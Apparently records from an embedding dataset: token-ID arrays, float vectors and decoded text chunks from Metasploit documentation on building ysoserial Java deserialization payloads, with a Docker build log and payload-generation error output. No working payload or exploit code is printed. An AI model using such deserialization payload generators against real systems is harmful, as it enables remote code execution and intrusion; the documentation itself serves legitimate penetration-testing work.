[ 6392, 2487, 1010, 26219, 2243, 2581, 2226, 17465, 1010, 9587, 5831, 17305, 10606, 2080, 2487, 1010, 2026, 12172, 2015, 2487, 1010, 4199, 1010, 3500, 2487, 1010, 3500, 2475, 1010, 1998, 12436, 17190, 2078, 2487, 1012, 2096, 1061, 17063, 11610, 2140, 2950, 3176, 18093, 2015, 2008, 2024, 2025, 3205, 2682, 1010, 2027, 2024, 4895, 6342, 9397, 15613, 2011, 1996, 3075, 2349, 2000, 1996, 2342, 2005, 3375, 20407, 1012, 2323, 2045, 2022, 2224, 3572, 2005, 3176, 18093, 2015, 1010, 3531, 5136, 3098, 2019, 3277, 1998, 12040, 3436, 1037, 4139, 5227, 2000, 5587, 2490, 1012, 18093, 1011, 1996, 18093, 4874, 2000, 15389, 2006, 1996, 6556, 2291, 1012, 2023, 2003, 1996, 3128, 18804, 13102, 4135, 4183, 18093, 4874, 1998, 2009, 2097, 2022, 8073, 4991, 2000, 2019, 4082, 2291, 3094, 2478, 1037, 6028, 7218, 2005, 1996, 4539, 4132, 1998, 4294, 1012, 2005, 2742, 1010, 1060, 20842, 3645, 18093, 2015, 2097, 2022, 4991, 2478, 1037, 4204, 18223, 3094, 1012, 2025, 2035, 7248, 1998, 4294, 14930, 2024, 3569, 1012, 4895, 6342, 9397, 15613, 14930, 2097, 2765, 1999, 1037, 2448, 7292, 2121, 29165, 2108, 2992, 2029, 2097, 2342, 2000, 2022, 8971, 2011, 1996, 11336, 9722, 1012, 1001, 9699, 1035, 9262, 1035, 4078, 11610, 22731, 1035, 2005, 1035, 3094, 1006, 2171, 1010, 5806, 1010, 3094, 1007, 2023, 4118, 2097, 9699, 1037, 27289, 9262, 4874, 2008, 2043, 8209, 2097, 15389, 1996, 3563, 4082, 2291, 3094, 2478, 1996, 9675, 5806, 1012, 1999, 19152, 1997, 1996, 3094, 2083, 1996, 5806, 6464, 11826, 2229, 14679, 2006, 1996, 3494, 2306, 1996, 4082, 2291, 3094, 1012, 2171, 1011, 1996, 18093, 2171, 16381, 1012, 2023, 2038, 1996, 2168, 7784, 2004, 1996, 2171, 16381, 2005, 1996, 1001, 9699, 1035, 9262, 1035, 4078, 11610, 22731, 1035, 2005, 1035, 18093, 4118, 1012, 5806, 1011, 1996, 5806, 2000, 2224, 2005, 1999, 22776, 1996, 3094, 1012, 2023, 3643, 2442, 2022, 2028, 1997, 1996, 2206, 1024, 24234, 1011, 1037, 6310, 2544, 2008, 2097, 1999, 6767, 3489, 1996, 3094, 2478, 1996, 24234, 4654, 8586, 23056, 27487, 2094, 1011, 1037, 6310, 2544, 2008, 2097, 1999, 6767, 3489, 1996, 3094, 2478, 1996, 3645, 4642, 2094, 1012, 4654, 2063, 4654, 8586, 23056, 1012, 4204, 18223, 1011, 1037, 6310, 2544, 2008, 2097, 1999, 6767, 3489, 1996, 3094, 2478, 1996, 3645, 4204, 18223, 1012, 4654, 2063, 4654, 8586, 23056, 1012, 3094, 1011, 1996, 4082, 2291, 3094, 2000, 15389, 2588, 3144, 4078, 11610, 22731, 1997, 1996, 7013, 4874, 1012, 19723, 24454, 5844, 1996, 1061, 17063, 11610, 2140, 1035, 18093, 1046, 3385, 5371, 1006, 5441, 2545, 2069, 1007, 4445, 11336, 9797, 4496, 5198, 2342, 2000, 5142, 3209, 2007, 1996, 2206, 1012, 2006, 6686, 1010, 18804, 13102, 4135, 4183, 5441, 2545, 2089, 2215, 2000, 2128, 1011, 2448, 1996, 5896, 4245, 2000, 13265, 2047, 9262, 27289, 5200, 2013, 1996, 1061, 17063, 11610, 2140, 6994, 1012, 2000, 4468, 1999, 22776, 9262, 1006, 1998, 2035, 2049, 12530, 15266, 1007, 2012, 2448, 7292, 1010, 1996, 27289, 5200, 2024, 7013, 1998, 17053, 2094, 2306, 1037, 1046, 3385, 5371, 1012, 1996, 1046, 3385, 5371, 2064, 2022, 25416, 21898, 2098, 2478, 1037, 26609, 10090, 5896, 1010, 2029, 3310, 17463, 8684, 18655, 2007, 1037, 8946, 2121, 3746, 2008, 16024, 8816, 2075 ]
metasploit
133.txt
1
ysoserial and necessary dependencies. the script, dockerimage and a high - level runme. sh script is stored within tools / payloads / ysoserial. an example run looks like : $ cd ~ / git / r7 / metasploit - framework / tools / payloads / ysoserial $. / runme. sh sending build context to docker daemon 101. 8mb step 1 / 8 : from ubuntu - - - > cd6d8154f1e1 step 2 / 8 : run apt update & & apt - y upgrade - - - > using cache - - - > ba7e5691ed5a step 3 / 8 : run apt install - y wget openjdk - 8 - jre - headless ruby - dev make gcc - - - > using cache - - - > d38488663627 step 4 / 8 : run wget - q url - o ysoserial - original. jar - - - > using cache - - - > 284ff722464b step 5 / 8 : run wget - q url - - - > using cache - - - > 334c1ccb6fab step 6 / 8 : run gem install - - silent diff - lcs json pry - - - > using cache - - - > 9d452be9d01f step 7 / 8 : copy find _ ysoserial _ offsets. rb / - - - > 61b6f339590c step 8 / 8 : cmd ruby / find _ ysoserial _ offsets. rb - - - > running in ba7b14646e56 removing intermediate container ba7b14646e56 - - - > f4ca5ecb6848 successfully built f4ca5ecb6848 successfully tagged ysoserial - payloads : latest generating payloads for beanshell1... generating payloads for c3p0... error while generating or serializing payload java. lang. illegalargumentexception : command format is : < base _ url > : < classname > at ysoserial. payloads. c3p0. getobject ( c3p0. java : 48 ) at ysoserial. generatepayload. main ( generatepayload. java
[ 0.3824830949306488, -0.5366246104240417, -0.5078629851341248, 0.33275723457336426, -0.3346293568611145, -0.03649046644568443, -0.18968196213245392, 0.439368337392807, 0.6802451014518738, 0.1225384920835495, 0.6913686394691467, -0.4532645642757416, 0.14350077509880066, -0.5935181379318237, -0.5770441889762878, -0.6685010194778442, 0.025542572140693665, -0.6146535277366638, -1.1866658926010132, -0.139364555478096, 0.200158029794693, -0.20932497084140778, -0.9590482115745544, -1.2227487564086914, 0.017818816006183624, 1.2813942432403564, 0.4580042064189911, 0.39178723096847534, 0.7675113081932068, 0.37140628695487976, 0.10291855037212372, -0.17252564430236816, -0.0876333937048912, -0.7187034487724304, 0.18859663605690002, 0.021554457023739815, 0.9731453657150269, 0.09028595685958862, 0.5150191783905029, -0.7622348666191101, 0.1848016381263733, -0.4062731862068176, -0.28203678131103516, 0.21336960792541504, -0.5818408131599426, -0.5505783557891846, 0.37684163451194763, -0.5812978148460388, 0.43149811029434204, 0.00389393069781363, 0.4904712438583374, 0.2188558280467987, 0.007065023761242628, 0.06005369871854782, 0.17777292430400848, -0.32766440510749817, 0.07842155545949936, -0.0639614388346672, -0.4283772110939026, 0.31946083903312683, -0.010214719921350479, 0.4792603552341461, 0.07971159368753433, -0.7540997266769409, -0.0917857438325882, 0.6884573698043823, 0.029678091406822205, 0.15280942618846893, -0.3769552409648895, -0.42789989709854126, -0.2711712419986725, 0.805475115776062, -0.6886769533157349, -0.6450645923614502, -0.7719058394432068, -0.3999071419239044, 0.12647680938243866, 0.3914526402950287, -0.30451256036758423, 0.11110448092222214, -0.08213131874799728, 0.5764762759208679, 0.2292805314064026, -0.2851209044456482, -0.765866219997406, -0.7586627006530762, 0.48922476172447205, 0.6899572610855103, -0.3564791679382324, 0.25763460993766785, -0.20756062865257263, 0.35740751028060913, -0.92595374584198, -0.08904668688774109, 0.04765360802412033, 0.8886401057243347, -0.2645717263221741, -0.4577835202217102, 0.13740010559558868, -0.4704350531101227, 1.0136984586715698, 0.9822689294815063, -0.18085749447345734, 0.7548807263374329, -0.7829866409301758, 0.1163010373711586, 0.7669128179550171, -0.16146618127822876, -0.18311579525470734, -0.37638911604881287, 0.468367338180542, 0.11417199671268463, 0.19009895622730255, -0.46545448899269104, -0.059608809649944305, 0.4830564558506012, 0.3427566885948181, 0.35926076769828796, -0.23346367478370667, 0.2817954123020172, -0.10866115242242813, -0.389992892742157, -0.1635390818119049, -0.46767178177833557, 0.05466780811548233, 0.13803501427173615, 0.731011688709259, 0.8753067255020142, -0.6278203129768372, -0.17958995699882507, 0.020224904641509056, -0.4530526101589203, 0.026883825659751892, 1.021881341934204, -0.908731997013092, 0.26516178250312805, 0.4197182357311249, 0.18148121237754822, 0.9469784498214722, -1.1584538221359253, 0.22241979837417603, 0.4385664165019989, 0.20325565338134766, 1.4556516408920288, 0.4172840416431427, -0.31656771898269653, -0.07984195649623871, -0.30183473229408264, -0.8946407437324524, 0.8706002831459045, -0.587995171546936, 0.2181018441915512, 0.5528566241264343, -0.17163053154945374, -0.4103321433067322, -0.30732324719429016, -0.6481901407241821, 0.3505435585975647, 0.28325140476226807, -0.012734776362776756, -0.46502766013145447, 0.1998147964477539, -0.3918565511703491, 0.14596877992153168, -0.28737038373947144, 1.0301735401153564, -0.39926913380622864, -0.669174075126648, -0.25145599246025085, 0.30995115637779236, 0.7413334846496582, 0.3655233681201935, -0.10512478649616241, 0.3987267017364502, 1.15213942527771, 0.8860373497009277, 0.15278953313827515, -0.3110141158103943, 0.26443856954574585, 0.24927540123462677, -0.6148777604103088, 0.6346012949943542, 0.00023530871840193868, 1.1476722955703735, -0.5024659633636475, 0.21798714995384216, -0.13241446018218994, -0.6194072365760803, -0.6781755089759827, -0.7346904277801514, -0.010640149004757404, 0.9329324960708618, -0.578850269317627, 0.7647243142127991, 0.22399194538593292, 0.3787948191165924, -0.7765307426452637, -0.8424750566482544, -0.7396714687347412, -1.4748607873916626, -0.17042183876037598, 0.6050297021865845, -0.31483128666877747, 0.5267444849014282, -0.7925569415092468, -0.2795964181423187, 1.1278375387191772, 0.6451172828674316, -0.32189470529556274, 1.1135400533676147, 1.0008385181427002, -0.19826777279376984, -1.0747981071472168, -0.17405663430690765, 0.0035969943273812532, -0.5017054677009583, -0.5160147547721863, 0.771679162979126, 0.004892558790743351, 0.09353147447109222, -0.3837033808231354, 0.4987775683403015, 0.5440846681594849, 0.13293872773647308, -0.21328160166740417, -0.1777026653289795, 0.163629412651062, 0.3174857497215271, -0.23077727854251862, -0.16629169881343842, -0.29492390155792236, 0.8775037527084351, 0.5029791593551636, 0.9980776906013489, -0.056120019406080246, 0.11497929692268372, 0.5939428210258484, 0.3121131658554077, -0.3200792968273163, -0.15781088173389435, -0.14296790957450867, 1.1356760263442993, 0.3787880539894104, 1.0967234373092651, 0.4041805565357208, 0.19917777180671692, -0.2649872303009033, 0.5863929390907288, 0.15918037295341492, 0.92400723695755, -0.7027532458305359, 0.6222455501556396, 0.9945109486579895, -0.26981133222579956, -1.1547805070877075, -0.3118508458137512, 0.4181510806083679, 0.9642186760902405, -0.3888981342315674, -1.0242621898651123, 0.04124745726585388, 0.40250304341316223, -0.6464532613754272, -0.5325070023536682, 0.3570421636104584, 0.4462641179561615, -0.14612740278244019, -0.029711635783314705, 0.2816964387893677, -0.487575501203537, -0.9493260383605957, -0.16720183193683624, -0.9477458000183105, -0.4444359838962555, -1.1802082061767578, 0.19988305866718292, 0.5876496434211731, -0.5404599905014038, 0.6348947286605835, -0.10428839176893234, -0.8088303208351135, 0.31139716506004333, 0.10208147764205933, 0.6880929470062256, 0.04608074948191643, -0.2020706981420517, -0.4839508831501007, 0.08226734399795532, 0.13740858435630798, 0.3154180347919464, -0.7220562100410461, -0.07127347588539124, -0.18130820989608765, -0.18511006236076355, 0.20097048580646515, 0.10619992017745972, 0.7706214189529419, -0.5788842439651489, 0.6819247007369995, -0.4012984335422516, 0.7296349406242371, -0.17469847202301025, 0.03115885704755783, -0.10268408060073853, -0.37590786814689636, 0.601804792881012, 0.38529205322265625, 0.10693613439798355, 0.7586144208908081, 0.7296196818351746, -0.8125980496406555, 0.6688389778137207, -0.22362402081489563, 0.305635929107666, -1.0574601888656616, 1.37540602684021, -0.04854389652609825, 0.002418298041447997, -0.29871681332588196, -0.2874002158641815, 0.3036259114742279, -0.21036657691001892, -0.4044085741043091, 0.1237398236989975, -0.7673816680908203, 0.4157121479511261, -0.14597974717617035, -1.0358302593231201, 0.6010718941688538, 0.3192155063152313, -0.15188075602054596, 0.19916914403438568, -0.5702453255653381, 0.6324376463890076, 0.11151506006717682, 0.253618985414505, -0.42417410016059875, -0.12936235964298248, -0.3692907989025116, 0.007233890239149332, 0.14241322875022888, -0.13724862039089203, 0.264890193939209, 0.2599751055240631, -0.15175935626029968, 0.8520774245262146, 0.9390352964401245, -0.23847176134586334, 0.40434589982032776, 0.09287263453006744, -0.31090131402015686, -0.1900349110364914, 0.5462785959243774, 0.2391054779291153, 0.23135919868946075, 0.7042100429534912, -0.5766683220863342, -0.4060877859592438, 0.2194586843252182, 0.2809157073497772, 0.7576194405555725, 0.549912691116333, 0.6454036831855774, -0.16768722236156464, 0.1024075523018837, -0.5480413436889648, -0.015586361289024353, -0.13237103819847107, 0.5753665566444397, 0.019870227202773094, 0.9089860320091248, -0.14716817438602448, -0.2470882087945938, 0.399073988199234, -0.24841724336147308, -0.9097087979316711, 0.5893798470497131, 0.21508988738059998, 0.5655336380004883, -0.10120486468076706, -0.3909243941307068, 0.5435668230056763, 0.29824864864349365, 0.6799769401550293, 0.47081875801086426, -0.0027028569020330906, -0.35084670782089233, -0.4991549253463745, 0.17055939137935638, -0.82506263256073, 0.1873653680086136, 0.19721487164497375, 0.3296394944190979, -0.12619154155254364, -1.0472513437271118, -0.36860236525535583, 0.258404940366745, 0.7924755215644836, 0.5087233185768127, 0.2447447031736374, 0.36670249700546265, 0.3595431447029114, -0.5261484384536743, 0.06635906547307968, -0.4633338749408722, 0.6597715020179749, -0.1561467945575714, 0.7028734087944031, -0.6053864359855652, 0.08283958584070206, -0.3322937488555908, 0.119054414331913, -0.5383802056312561, -0.1897534877061844, 0.6613250970840454, -0.13909317553043365, -0.5959391593933105, 0.08698324859142303, 0.2466917484998703, -0.3681591749191284, -0.20370016992092133, -0.05900508165359497, -0.12543731927871704, 0.4982047975063324, 0.45686566829681396, -1.1549936532974243, -0.027445243671536446, -0.6351839900016785, -0.25650060176849365, 0.33481332659721375, 0.005524397827684879, -0.25391459465026855, -0.6177501678466797, 0.1082308366894722, -0.7851063013076782, 0.21235306560993195, 0.11142194271087646, 0.8920258283615112, 0.1949949562549591, -0.95451420545578, 0.3560178577899933, 0.6998046040534973, -0.0475708469748497, -0.7662472128868103, -0.023676441982388496, 0.1524990200996399, 0.852007269859314, 1.0163705348968506, -0.3266729414463043, 0.012199441902339458, 0.15672793984413147, -0.39978304505348206, 0.2511445879936218, -0.6990441679954529, 0.42864739894866943, 0.2277248054742813, -0.22465646266937256, 0.04901077225804329, 0.44104713201522827, -0.46256253123283386, -0.317497193813324, -0.38060295581817627, 0.27602076530456543, -0.37954986095428467, -0.4560520350933075, 1.1469788551330566, -0.15555360913276672, -0.07907462865114212, 0.5708999037742615, 0.29076114296913147, -0.46931663155555725, 0.2861115336418152, -0.21391907334327698, -0.512670636177063, 0.24107496440410614, -0.4258354902267456, 0.8559540510177612, 0.13560903072357178, 0.0008313567377626896, 0.4320479929447174, -0.1651766151189804, 0.5360046029090881, -0.14503590762615204, -0.5499702095985413, -0.9371140003204346, -0.7005554437637329, 0.08090708404779434, 0.4297020137310028, -0.2649592459201813, -0.1724568009376526, 0.14684021472930908, -0.43213245272636414, 0.12994585931301117, -0.22348862886428833, -0.8210726976394653, -1.6269837617874146, -0.35842686891555786, 0.5087646245956421, -0.13490290939807892, 0.1581493318080902, 0.15894761681556702, -0.48590999841690063, -0.7555308938026428, 0.7306843400001526, -0.5650412440299988, -0.01998407393693924, -0.6423137784004211, -0.025400539860129356, -0.4783754348754883, -0.23030877113342285, 0.08121061325073242, 0.148149311542511, -0.2560197710990906, 0.15580697357654572, 0.23621314764022827, 0.39181649684906006, -0.2049809992313385, -0.4685817062854767, -0.3945917785167694, 1.1592978239059448, -0.06331788003444672, -0.8457061052322388, -0.027460796758532524, 0.3119506537914276, -0.4015686511993408, 0.06088034808635712, -0.2916052043437958, -0.9344568252563477, -1.1127426624298096, -1.0025101900100708, 0.05800092592835426, -0.6611105799674988, 0.26127174496650696, -0.4629655182361603, -0.6344553828239441, 0.1543189436197281, 0.48694849014282227, -0.11492402106523514, -0.9225560426712036, -0.007692459039390087, -0.3654187023639679, 0.36822113394737244, 0.2136634886264801, -0.48197025060653687, -0.6329775452613831, -0.7715156674385071, -0.07553993910551071, 0.9852010011672974, 0.10525744408369064, 0.11166027188301086, 0.12049272656440735, 0.3249319791793823, -0.010740434750914574, 0.47600728273391724, -0.44746699929237366, -0.45829299092292786, 0.3202860355377197, -0.0635906308889389, -0.09414215385913849, 0.2152174562215805, -0.42087674140930176, 0.3957337737083435, -0.5806075930595398, 0.2647331655025482, -0.0016022420022636652, -0.40698543190956116, -0.020671049132943153, -0.23611009120941162, 1.0914901494979858, -0.9223939180374146, -0.4514661133289337, -0.18160651624202728, 0.8197634816169739, 0.1370268017053604, 0.0033750240691006184, -0.8548063635826111, 0.015368022955954075, -0.49880608916282654, -1.2367620468139648, 0.25920337438583374, -0.1896151900291443, -0.8916341662406921, -0.038374919444322586, -0.20942482352256775, 0.23997151851654053, -0.8424020409584045, 0.2422640174627304, 0.6298772096633911, 0.13618148863315582, 0.12294044345617294, -0.838343620300293, 0.0774337500333786, 0.24515128135681152, -0.40461111068725586, -0.19491241872310638, -0.17824865877628326, -0.8864203691482544, 0.21488744020462036, -0.30564919114112854, -0.09503541886806488, -0.7382075190544128, -0.2277587205171585, 0.8134568929672241, -0.17793959379196167, 0.5257577896118164, 0.5242196321487427, -1.0898908376693726, -0.5559267997741699, 0.46305179595947266, 0.7163044810295105, 0.26890259981155396, 0.6215221881866455, 0.1848844289779663, 0.5022788047790527, -0.5722850561141968, 0.20681443810462952, -0.6549651622772217, -0.2236289083957672, 0.9240798950195312, -0.061218421906232834, -0.49037936329841614, 1.2647086381912231, 0.3774959146976471, -0.8147276639938354, -0.38112306594848633, 0.07643453776836395, -0.2962386906147003, -0.1216336190700531, -0.22736915946006775, -0.4929673969745636, 0.03545355051755905, 0.5023794174194336, -0.17500105500221252, 0.4003831744194031, -0.00987338274717331, 0.01896348036825657, -1.102125644683838, 0.3395003378391266, -0.12500976026058197, 0.44807910919189453, 1.0411574840545654, -0.5013230443000793, -0.1103353500366211, -0.8058862090110779, -0.25062745809555054, 0.09167657792568207, 0.1023581400513649, 0.6947848796844482, -0.22616328299045563, 0.5232576131820679, -0.07964568585157394, 0.1992284059524536, 0.8200334906578064, -0.11565826088190079, 0.8478450775146484, 0.7064559459686279, 0.016486575827002525, -0.888532817363739, -0.8372195363044739, 0.48837172985076904, -0.18582087755203247, 0.1161552146077156, -0.2441682517528534, -0.44235333800315857, -0.09248705208301544, 0.05086455121636391, -0.0339728519320488, -0.7652145028114319, -1.0426418781280518, -0.9498556852340698, -0.07949383556842804, 0.21431954205036163, -0.45427682995796204, -0.276151567697525, 0.04257047921419144, -0.38720014691352844, -0.4124372899532318, -0.7076906561851501, 0.35788029432296753, -0.10869480669498444, -0.15200315415859222, -0.6090517044067383, 0.24704813957214355, -0.7562535405158997, 0.09539633244276047, -0.20115472376346588, -0.3282647132873535, -0.3981572389602661, -0.4994624853134155, -0.6668513417243958, -0.25449812412261963, -0.6430888175964355, 0.7573407888412476, -0.10598942637443542, -0.09721570461988449, 0.16399496793746948, -0.5457020998001099, -0.10129214078187943, 0.7120817303657532, -0.1974078267812729, 0.4345345199108124, 0.08824390172958374, -0.09426718205213547, -0.023781610652804375, -0.6549493074417114, -0.4256611764431, 0.17972500622272491, 0.4511694312095642, 0.35080036520957947, 0.2604963183403015, -0.5146678686141968, 0.43195080757141113, 0.05423598363995552, -0.5712616443634033, -0.13894477486610413, -0.6179351806640625, -0.34283673763275146, 0.537631094455719, -0.10131317377090454, 0.4629681706428528, 0.8012450933456421, 0.3667992353439331, 0.1518506109714508, -0.5403965711593628, 0.6917712688446045, 0.21686148643493652, -0.2376834899187088, 0.5062056183815002, -0.05390956252813339, 0.5695467591285706, -0.06325598061084747, 0.5627391338348389, 0.4483421742916107, 0.15255285799503326, 1.3159929513931274, -0.08563320338726044, 0.1097322627902031, -0.5233818888664246, -0.11224962770938873, -0.07006337493658066, 0.29193007946014404, 0.585376501083374, -0.36074206233024597, -0.016843236982822418, -0.2645213007926941, -0.6339490413665771, 0.2487328052520752, -0.5357798933982849, 0.25825390219688416, -0.016810255125164986, -1.096991777420044, 0.05057430639863014, -0.7661601305007935, 0.2626723349094391, -0.25631123781204224, -0.23693057894706726, -0.43027591705322266, 0.20096434652805328, -0.21975046396255493, -0.051995743066072464, 0.8401781916618347, -0.6779200434684753, -0.34562963247299194, -0.1552950143814087, 0.5681174993515015, -1.069501519203186, -1.2574918270111084, 0.26502689719200134, 1.094386339187622, -0.047937728464603424, -0.30972492694854736, -0.514813244342804, 0.3024024963378906, 0.6427727341651917, 0.7130857110023499, -0.45056891441345215, -0.007265456952154636, -0.6639708876609802, 0.6572625041007996, -0.25405049324035645, 0.38433727622032166, 0.2559364438056946, -0.11245895177125931, 0.3313029706478119, -0.016116134822368622, -0.4337363541126251, 0.5773184895515442, 0.08667558431625366, 0.49056997895240784, 0.6458688378334045, 0.36072802543640137, 0.5693003535270691, -0.5215480923652649, 0.30076152086257935, -0.2619971036911011, -0.04162288457155228, 0.5080985426902771, 0.9144945740699768, -0.3136902153491974, 0.674167811870575, 0.35690101981163025, -0.8348705172538757, -0.6043255925178528, 0.681415319442749, -0.03560663014650345, -0.4307918846607208, 0.1303243339061737, -0.21546755731105804, 0.35782769322395325, 0.2604939639568329, -0.36550599336624146, 0.08421040326356888, -0.30406424403190613, -0.12895190715789795, -0.2901564836502075, -0.08181670308113098, 0.23484598100185394, -0.9764506816864014, 0.8158025145530701, 0.4838460087776184, -0.21979489922523499, 0.652600884437561, 0.22158199548721313, -0.8093829154968262, 1.1218153238296509, 0.896567165851593, 0.2644127607345581, -0.029284650459885597, 0.5046465992927551, -0.5372791886329651, 0.5300270915031433, 0.4717170298099518, -0.5457872748374939, -0.4217609167098999, 0.3896726965904236, 0.23518238961696625, -0.6188222765922546, -0.33616670966148376, 0.6430612206459045, 0.2892948389053345, 0.06332139670848846, 0.2351422905921936, 0.18712815642356873, 0.12811602652072906, -0.7149481177330017, -0.14448687434196472, -0.5413838028907776, 0.35601240396499634, 0.5356583595275879, -0.20144838094711304, -0.27040690183639526, 0.6611910462379456, 0.04645455628633499, 0.7642085552215576, -0.31268972158432007, 1.2906934022903442, -0.36684221029281616, 0.4844156503677368, 0.727648138999939, -0.026516862213611603, -0.33739376068115234, -0.09042777866125107, -0.02689693309366703, -0.26026466488838196, 0.5048325657844543, -0.23863033950328827, 0.4396746754646301, -0.7025034427642822, -0.022225556895136833, -0.8345674276351929, 0.9838054180145264, -0.5286343693733215, -1.1771776676177979, 0.9057036638259888, -0.15061743557453156, -0.37205299735069275, 0.3221496343612671, 0.4246422052383423, 0.5239205360412598, 0.009631332010030746, -0.305446982383728, -0.7773596048355103, -0.46825939416885376, -0.14082257449626923, -0.10237758606672287, 0.5651304721832275, -0.18575339019298553, -0.3236313760280609, -0.01733294315636158, -1.193889856338501, -0.8912025690078735, -0.14918407797813416, -0.30925604701042175, -0.784386157989502, 0.7801105380058289, 0.6291876435279846, 0.8452703952789307, 0.08413311839103699, -0.5129178762435913, -0.5077950954437256, 0.29490014910697937, 1.0316989421844482, 0.0651806965470314, 0.9607003927230835, 0.7134487628936768, -0.18866312503814697, 0.3687381148338318, 0.18480364978313446, 0.8913983106613159, -0.4743953049182892, 0.04337823763489723, 0.07336290180683136, 0.04447763413190842, -1.2487425804138184, -0.06353023648262024, -0.3352271616458893, 0.041696690022945404, 0.2518768906593323, -0.17330890893936157, -0.9844003319740295, 0.282533198595047, -0.768014132976532, 0.045250143855810165, -0.2509342432022095, -0.2970215976238251, 0.4857048988342285, 0.12792591750621796, 0.6186954975128174, -1.4223352670669556, 4.0847697257995605, 0.4858020544052124, 0.8842200636863708, -0.17360243201255798, 0.27181899547576904, 0.6300493478775024, 1.096744418144226, -1.3658660650253296, -0.01990068145096302, -0.2801038920879364, 0.5288140773773193, -0.1293293684720993, 0.4181400239467621, 0.08120749145746231, 0.6917862892150879, 0.6975849866867065, -0.3636878430843353, -0.08493071049451828, 0.3351036012172699, -0.9844544529914856, -0.965447187423706, 0.21747614443302155, -0.3157365918159485, 0.9141363501548767, 0.8287312984466553, 0.1168261468410492, 0.1692488044500351, -0.5266866683959961, -0.023223521187901497, 0.1400611251592636, 0.12516014277935028, -0.2055872678756714, 0.3708573281764984, -0.3334128260612488, -0.6035551428794861, 0.6545597314834595, -0.1644853949546814, -1.2127234935760498, -0.18068687617778778, 0.0017743298085406423, 0.022004259750247, -0.08854558318853378, 0.309051513671875, -0.7215485572814941, -0.4176129102706909, 0.34406498074531555, -0.7321268320083618, 0.16688460111618042, 0.602934718132019, -1.3515578508377075, 0.7486699819564819, -0.024157240986824036, 0.706253707408905, -0.22861097753047943, -1.003995418548584, 0.05870118737220764, -0.2862706780433655, -0.4546670615673065, 0.23272621631622314, 0.20447959005832672, 0.6194202899932861, -0.4455236494541168, -0.27197760343551636, -0.13937094807624817, -1.2483184337615967, 0.7784960865974426, -0.3467358946800232, 0.40824323892593384, -0.3009144365787506, -0.38238459825515747, 0.11515188217163086, -0.1667243391275406, -0.3763297200202942, -0.0951470360159874, 1.1111739873886108, 0.1700727343559265, -0.09097898006439209, 0.6168572902679443, 0.9663654565811157, -0.3682592213153839, -0.24920667707920074, -0.8247272372245789, -1.5012975931167603, 0.6159870624542236, 0.5482717752456665, 0.48769691586494446, -0.1339745968580246, -0.6301504373550415, -0.40700575709342957, 0.8534418940544128, 0.514155387878418, 0.5687703490257263, -0.7698660492897034, 0.08185258507728577, 0.5228539705276489 ]
[ 1061, 17063, 11610, 2140, 1998, 4072, 12530, 15266, 1012, 1996, 5896, 1010, 8946, 11124, 26860, 1998, 1037, 2152, 1011, 2504, 2448, 4168, 1012, 14021, 5896, 2003, 8250, 2306, 5906, 1013, 18093, 2015, 1013, 1061, 17063, 11610, 2140, 1012, 2019, 2742, 2448, 3504, 2066, 1024, 1002, 3729, 1066, 1013, 21025, 2102, 1013, 1054, 2581, 1013, 18804, 13102, 4135, 4183, 1011, 7705, 1013, 5906, 1013, 18093, 2015, 1013, 1061, 17063, 11610, 2140, 1002, 1012, 1013, 2448, 4168, 1012, 14021, 6016, 3857, 6123, 2000, 8946, 2121, 12828, 7886, 1012, 1022, 14905, 3357, 1015, 1013, 1022, 1024, 2013, 1057, 8569, 3372, 2226, 1011, 1011, 1011, 1028, 3729, 2575, 2094, 2620, 16068, 2549, 2546, 2487, 2063, 2487, 3357, 1016, 1013, 1022, 1024, 2448, 26794, 10651, 1004, 1004, 26794, 1011, 1061, 12200, 1011, 1011, 1011, 1028, 2478, 17053, 1011, 1011, 1011, 1028, 8670, 2581, 2063, 26976, 2683, 2487, 2098, 2629, 2050, 3357, 1017, 1013, 1022, 1024, 2448, 26794, 16500, 1011, 1061, 1059, 18150, 2330, 3501, 2094, 2243, 1011, 1022, 1011, 3781, 2063, 1011, 2132, 3238, 10090, 1011, 16475, 2191, 1043, 9468, 1011, 1011, 1011, 1028, 2478, 17053, 1011, 1011, 1011, 1028, 1040, 22025, 18139, 20842, 2575, 21619, 22907, 3357, 1018, 1013, 1022, 1024, 2448, 1059, 18150, 1011, 1053, 24471, 2140, 1011, 1051, 1061, 17063, 11610, 2140, 1011, 2434, 1012, 15723, 1011, 1011, 1011, 1028, 2478, 17053, 1011, 1011, 1011, 1028, 26871, 4246, 2581, 19317, 21472, 2549, 2497, 3357, 1019, 1013, 1022, 1024, 2448, 1059, 18150, 1011, 1053, 24471, 2140, 1011, 1011, 1011, 1028, 2478, 17053, 1011, 1011, 1011, 1028, 29562, 2278, 2487, 9468, 2497, 2575, 7011, 2497, 3357, 1020, 1013, 1022, 1024, 2448, 17070, 16500, 1011, 1011, 4333, 4487, 4246, 1011, 29215, 2015, 1046, 3385, 29198, 1011, 1011, 1011, 1028, 2478, 17053, 1011, 1011, 1011, 1028, 1023, 2094, 19961, 2475, 4783, 2683, 2094, 24096, 2546, 3357, 1021, 1013, 1022, 1024, 6100, 2424, 1035, 1061, 17063, 11610, 2140, 1035, 16396, 2015, 1012, 21144, 1013, 1011, 1011, 1011, 1028, 6079, 2497, 2575, 2546, 22394, 2683, 28154, 2692, 2278, 3357, 1022, 1013, 1022, 1024, 4642, 2094, 10090, 1013, 2424, 1035, 1061, 17063, 11610, 2140, 1035, 16396, 2015, 1012, 21144, 1011, 1011, 1011, 1028, 2770, 1999, 8670, 2581, 2497, 16932, 21084, 2575, 2063, 26976, 9268, 7783, 11661, 8670, 2581, 2497, 16932, 21084, 2575, 2063, 26976, 1011, 1011, 1011, 1028, 1042, 2549, 3540, 2629, 8586, 2497, 2575, 2620, 18139, 5147, 2328, 1042, 2549, 3540, 2629, 8586, 2497, 2575, 2620, 18139, 5147, 26610, 1061, 17063, 11610, 2140, 1011, 18093, 2015, 1024, 6745, 11717, 18093, 2015, 2005, 13435, 18223, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 1039, 2509, 2361, 2692, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 11374, 1012, 6206, 2906, 22850, 15781, 2595, 24422, 1024, 3094, 4289, 2003, 1024, 1026, 2918, 1035, 24471, 2140, 1028, 1024, 1026, 2465, 18442, 1028, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 1039, 2509, 2361, 2692, 1012, 2131, 16429, 20614, 1006, 1039, 2509, 2361, 2692, 1012, 9262, 1024, 4466, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262 ]
metasploit
133.txt
2
